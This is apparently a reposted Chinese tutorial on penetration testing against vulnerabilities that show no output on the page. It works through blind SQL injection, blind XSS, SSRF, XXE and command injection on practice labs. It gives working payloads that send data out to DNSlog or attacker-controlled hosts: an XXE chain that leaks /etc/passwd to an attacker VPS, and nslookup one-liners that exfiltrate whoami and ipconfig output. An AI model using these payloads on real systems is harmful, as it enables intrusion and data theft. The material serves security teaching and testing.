0x01前言
在滲透測驗程序中,開發不可能每一次都將結果輸出到頁面上,也就是漏洞無回顯的情況,那么在這種情況下,我們可以通過dnslog判斷漏洞存在,或者通過起一個python的http服務來判斷,方法很多,下面主要進行一些情況的分析,
0x02無回顯概念
無回顯,即執行的payload在站點沒有輸出,無法進行進一步操作,在滲透測驗程序中,漏洞點不可能總是能夠在回傳頁面進行輸出,那么這時候就需要進行一些無回顯利用了,
0x03不同漏洞的無回顯
1、SQL注入無回顯
SQL注入,作為OWASP常年占據榜首位置的漏洞,在無回顯中也是常見的,當然SQL注入在無回顯上已經具有了一定的解決措施,
無回顯我將其定義為頁面沒有輸出我們想要得到的內容,下面以sqli-labs為例進行講解,
1.1 布爾盲注
布爾盲注,盲注的一種,當網站通過查詢陳述句的布林值回傳真偽來輸出頁面資訊的時候,查詢陳述句為真,頁面輸出內容;查詢陳述句為假,頁面不輸出內容,那么這里就可以通過構造等號判斷,獲取相應的字符的ascii碼,最后還原出資料,具體測驗程序如下:
1、id傳參1之后,頁面回傳有資料,這里明顯不能進行顯錯注入了,
2、在傳參后面加個單引號,頁面回傳空,不顯示錯誤資訊,不能使用報錯注入,
3、通過拼接and 1=1和and 1=2,發現頁面對于布林值的真與假回傳的頁面結果也不同,
4、通過length()函式判斷資料庫庫名的長度大于1,
?id=1’ and length(database())>1 %23
5、在大于8的時候頁面回傳空,所以資料庫庫名長度等于8,
6、通過ascii()函式和substr ()截取函式獲取資料庫庫名的第一個字符的ascii碼
?id=1’ and ascii(substr((select database()),1,1))>97 %23
?id=1’ and ascii(substr((select database()),1,1))=101 %23
首先用大于號判斷出大概所處的值,最后使用等于號驗證ascii碼的值,此處得出資料庫庫名的第一個字符的ascii碼值為115,對應字符為s,
7、更改截取的位置,判斷后面的字符對應的ascii碼值,
?id=1’ and ascii(substr((select database()),2,1))=101 %23
1.2 延時盲注
延時盲注,一種盲注的手法,在滲透測驗程序中當我們不能使用顯錯注入、報錯注入以及布爾盲注無論布林值為真還是為假,頁面都回傳一樣之后,我們可以嘗試使用延時盲注,通過加載頁面的時間長度來判斷資料是否成功,在PHP中有一個if()函式,語法為if(exp1,exp2,exp3),當exp1回傳為真時,執行exp2,回傳為假時,執行exp3,配合延時函式sleep()來獲取相應資料的ascii碼,最后還原成資料,下面我將通過實體來介紹如今進行延時盲注,
1、首先獲取的頁面如下,后面不論接上布林值為真還是為假的,頁面都回傳一樣,此時將不能使用布爾盲注,
2、通過and拼接延時函式查看頁面是否有延時回顯,首先記錄沒有使用延時函式的頁面回傳時間,為4.*秒;使用sleep(5)延時5秒之后,頁面回應時間為9.*秒,說明對于我們輸入的sleep()函式進行了延時處理,此處存在延時盲注,
3、通過延時注入判斷資料庫庫名的長度,一個個測驗發現當長度等于8時頁面延時回傳了,說明資料庫庫名長度為8,
?id=2’ and if((length(database())=8),sleep(5),1) %23
4、與布爾盲注一樣,將子查詢的資料截斷之后判斷ascii碼,相等時延時5秒,最后得到第一個字符的ascii碼為115,
?id=2’ and if((ascii(substr((select database()),1,1))=115),sleep(5),1) %23
5、后面替換截斷的位置,測驗后面的字符的ascii碼值,最后得到對應的ascii碼值為115 101 99 117 114 105 116 121,通過ascii解碼工具解得資料庫庫名為security,
巧用dnslog進行SQL注入
前面介紹了SQL注入中的盲注,通過布爾盲注或者延時盲注來獲取資料需要的步驟非常繁瑣,不僅需要一個一個字符的獲取,最后還需要進行ascii解碼,這需要花費大量的時間與精力,為了加快滲透行程,以及降低獲取資料的難度,這里介紹如何通過dnslog進行SQL注入,
Dnslog
dnslog,即dns日志,會決議訪問dns服務的記錄并顯示出來,常被用來測驗漏洞是否存在以及無法獲取資料的時候進行外帶資料,簡單來說,dnslog就是一個服務器,會記錄所有訪問它的記錄,包括訪問的域名、訪問的IP以及時間,那么我們就可以通過子查詢,拼接dnslog的域名,最后通過dns日志得到需要的資料,
Load_file()函式
資料庫中的load_file()函式,可以加載服務器中的內容,load_file(‘c:/1.txt’),讀取檔案并回傳內容為字串,使用load_file()函式獲取資料需要有以下幾個條件:
1.檔案在服務器上
2.指定完整路徑的檔案
3.必須有FILE權限
UNC路徑
UNC路徑就是類似\softer這樣的形式的網路路徑,它符合 \服務器名\服務器資源的格式,在Windows系統中常用于共享檔案,如\192.168.1.1\共享檔案夾名,
Dnslog注入實體演示
1、打開實體站點,很明顯這里是只能使用盲注的站點,
2、通過order by判斷出欄位數為3,
3、在dnslog網站申請一個dnslog域名:pcijrt.dnslog.cn
4、通過load_file函式拼接查詢資料庫庫名的子查詢到dnslog的域名上,后面任意接一個不存在的檔案夾名,最后將這個查詢放到聯合查詢中,構造的payload如下:
?id=1 ' union select 1,2,load_file(concat('//',(select database()),'.pcijrt.dnslog.cn
/abc')) %23
5、執行陳述句之后在dnslog日志中獲取到資料庫庫名為security,
6、修改子查詢里的內容,獲取其他資料,
2、XSS無回顯
XSS無回顯比較特殊,一般XSS漏洞的判斷標準為彈框,但是有這樣一種情況,在一個表單提交處,內容提交之后只會在頁面顯示提交成功與否,不會輸出提交的內容,那么我們也就無法通過彈框來判斷XSS漏洞存在與否,這時候就需要通過XSS盲打來進行攻擊,下面通過Pikachu漏洞練習平臺來進行實體講解:
2.1 XSS盲打
1、如圖這里是一個提交看法的功能
2、隨便輸入內容提交,告訴我們提交成功,沒有將我輸入的內容回傳到頁面中
3、登錄后臺可以看到確實有資料回顯
4、輸入彈框陳述句會在后臺成功執行
5、在滲透測驗程序中我們無法登錄后臺進行查看,那么就需要盲打XSS,輸入XSS平臺的payload,坐等管理員查看內容后上鉤,
2.2 通過dnslog判斷漏洞存在
payload:
<img src=http://xss.t7y3wc.dnslog.cn>
3、SSRF無回顯
SSRF即服務端請求偽造,一種由攻擊者構造的通過服務器發起請求的攻擊,
測驗代碼如下:
<?php
echo file_get_contents($_GET['url']);
?>
首先通過訪問百度可以驗證漏洞存在
無回顯情況即不進行輸出,頁面回傳空
這種情況可以通過dnslog或者python搭建http服務驗證
1、DNSLOG
http://172.16.29.2/ssrf_test.php?url=http://ssrf.02c6ot.dnslog.cn
2、python起的http服務
python3 -m http.server 4545
4、XXE無回顯
因為XML是用來存盤傳輸資料的,除了確實是業務需要,否則開發不可能會輸出內容,也就是說你確實讀取到了檔案內容,但是沒辦法看到,XXE無回顯問題當然也是可以通過在域名前面放入查詢出的內容,將資料通過dns日志記錄下來,
XXE雖然不是通過DNSlog,但是也同樣是外帶資料,
流程如下:
在受害者網站中,我們通過請求攻擊者VPS上的1.xml檔案,檔案內容為將某資料放在GET傳參中去訪問2.php,然后2.php中的內容為保存GET傳參的資料,將資料放入到3.txt中,
具體檔案內容放在下面,里面的IP地址應該為攻擊者的IP地址,這3個檔案也是放在攻擊者VPS上,
1.xml
<!ENTITY% all "<!ENTITY % send SYSTEM 'http://攻擊者的IP地址/2.php?id=%file;'>">%all;
2.php
<?php file_put_contents("3.txt",$_GET["id"],FILE_APPEND);?>
3.txt
內容空
payload:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % remote SYSTEM"http://服務器IP地址/xxe/1.xml">
%remote;
%send;
]>
5、命令執行無回顯
簡單的命令執行站點
輸入任何命令都無回顯
5.1 Dnslog判斷漏洞存在
5.2Dnslog外帶資料
5.2.1 獲取windows用戶名
http://127.0.0.1/test_blind/exec.php?cmd=ping+%USERNAME%.io5a5i.dnslog.cn
5.2.2 其他命令執行
cmd /c whoami > temp && certutil -encode -f temp temp&&FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c nslookup %_:~0,-1%.xxxx.ceye.io)&del temp
cmd /c ipconfig > temp && certutil -encode -f temp temp&&FOR /F "eol=- delims=" %i IN (temp) DO (set _=%i & cmd /c nslookup %_:~0,40%.xxxx.ceye.io & cmd /c nslookup %_:~40,-1%.xxxx.ceye.io)&del temp
通過POST傳參測驗
傳參的內容需要進行url編碼
Post傳參
Dnslog獲取結果
Base64解碼獲取內容
想學習網安到處找資源的,來這直接白嫖幾個G的資源,網安視頻、工具包、ctf、滲透測驗、逆向工程等
【資源獲取】
總結
在滲透測驗程序中,無回顯是很常見的,程式不可能將一些操作都回顯到頁面中,那么這種時候我們就需要外帶資料來獲取想要的內容,當然最好就是能夠反彈shell,通過獲取shell來執行命令,這樣會舒服很多,
無回顯的情況還有很多很多,這里簡單介紹了幾種,希望讀者朋友們能夠從中學到對于無回顯的情況下如何進行滲透測驗,方法很多,不固定,學習思路即可,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/293517.html
標籤:其他